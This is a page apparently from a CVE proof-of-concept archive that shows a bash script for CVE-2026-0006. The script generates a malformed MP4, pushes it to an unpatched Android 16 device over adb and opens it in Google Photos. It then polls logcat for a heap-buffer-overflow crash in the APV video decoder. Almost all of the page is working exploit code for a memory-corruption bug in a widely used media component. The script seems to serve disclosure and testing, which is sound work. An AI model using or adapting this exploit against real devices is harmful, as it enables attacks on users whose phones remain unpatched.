5465 Total CVEs
26 Years
GitHub
Home / 2026 / CVE-2026-0006
README.md
Rendering markdown...
POC / deploy_exploit_mp4.sh SH
⬇ Raw GitHub ✕ Close 
#!/usr/bin/env bash
#
# CVE-2026-0006 — Generate, push, and open exploit MP4 on Android device
#
# Prerequisites:
#   - valid.apv and apv-mp4/valid_ffmpeg.mp4 in the same directory
#   - adb connected to an Android 16 device/emulator (pre-March 2026 patch)
#   - python3 available
#
# Usage:
#   ./deploy_exploit_mp4.sh
#

set -euo pipefail

SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
MP4_FILE="$SCRIPT_DIR/apv-mp4/overflow_auinfo.mp4"
DEVICE_PATH="/sdcard/Download/overflow_auinfo.mp4"

echo "[1/5] Generating exploit MP4..."
python3 "$SCRIPT_DIR/generate_overflow_mp4.py"

if [ ! -f "$MP4_FILE" ]; then
    echo "[-] Failed: $MP4_FILE not found" >&2
    exit 1
fi
echo "[+] Generated: $MP4_FILE ($(wc -c < "$MP4_FILE") bytes)"

echo "[2/5] Checking adb connection..."
adb wait-for-device
DEVICE=$(adb get-serialno)
echo "[+] Connected: $DEVICE"

echo "[3/5] Pushing to device..."
adb push "$MP4_FILE" "$DEVICE_PATH"

echo "[4/5] Triggering media scan and opening in Google Photos..."
adb logcat -c

adb shell am broadcast \
    -a android.intent.action.MEDIA_SCANNER_SCAN_FILE \
    -d "file://$DEVICE_PATH" > /dev/null

sleep 1

adb shell am start \
    -a android.intent.action.VIEW \
    -d "file://$DEVICE_PATH" \
    -t video/mp4 \
    -n com.google.android.apps.photos/.viewer.pager.IntentPhotoPagerActivity \
    2>/dev/null \
|| adb shell am start \
    -a android.intent.action.VIEW \
    -d "file://$DEVICE_PATH" \
    -t video/mp4 \
    2>/dev/null \
|| echo "[!] Could not auto-open — open Google Photos manually"

echo ""
echo "[5/5] Waiting for crash..."

for attempt in 1 2 3; do
    sleep 5
    CRASH=$(adb logcat -d -s DEBUG:F | grep -A 30 "signal 11\|AddressSanitizer\|SIGABRT\|SIGSEGV" || true)

    if [ -n "$CRASH" ]; then
        echo ""
        echo "============================================"
        echo "  CRASH DETECTED (attempt $attempt)"
        echo "============================================"
        echo "$CRASH"
        echo "============================================"
        echo ""
        echo "[+] Full tombstone / logcat:"
        echo ""
        adb logcat -d | grep -E "DEBUG|AddressSanitizer|heap-buffer-overflow|WRITE of size|SUMMARY|backtrace|blk_to_imgb|dec_thread|oapvd_decode|C2SoftApvDec|SEGV|signal 11|located.*bytes after" | head -40
        break
    fi

    if [ "$attempt" -lt 3 ]; then
        echo "[*] No crash yet (attempt $attempt/3), retriggering..."
        adb logcat -c
        adb shell am force-stop com.google.android.apps.photos 2>/dev/null || true
        sleep 1
        adb shell am start \
            -a android.intent.action.VIEW \
            -d "file://$DEVICE_PATH" \
            -t video/mp4 \
            2>/dev/null || true
    fi
done

if [ -z "$CRASH" ]; then
    echo "[*] No crash after 3 attempts. Monitor manually:"
    echo "    adb logcat -s DEBUG:F | grep -A 30 'signal 11'"
    echo ""
    echo "[*] Or check for tombstones:"
    echo "    adb shell ls -lt /data/tombstones/ | head -5"
fi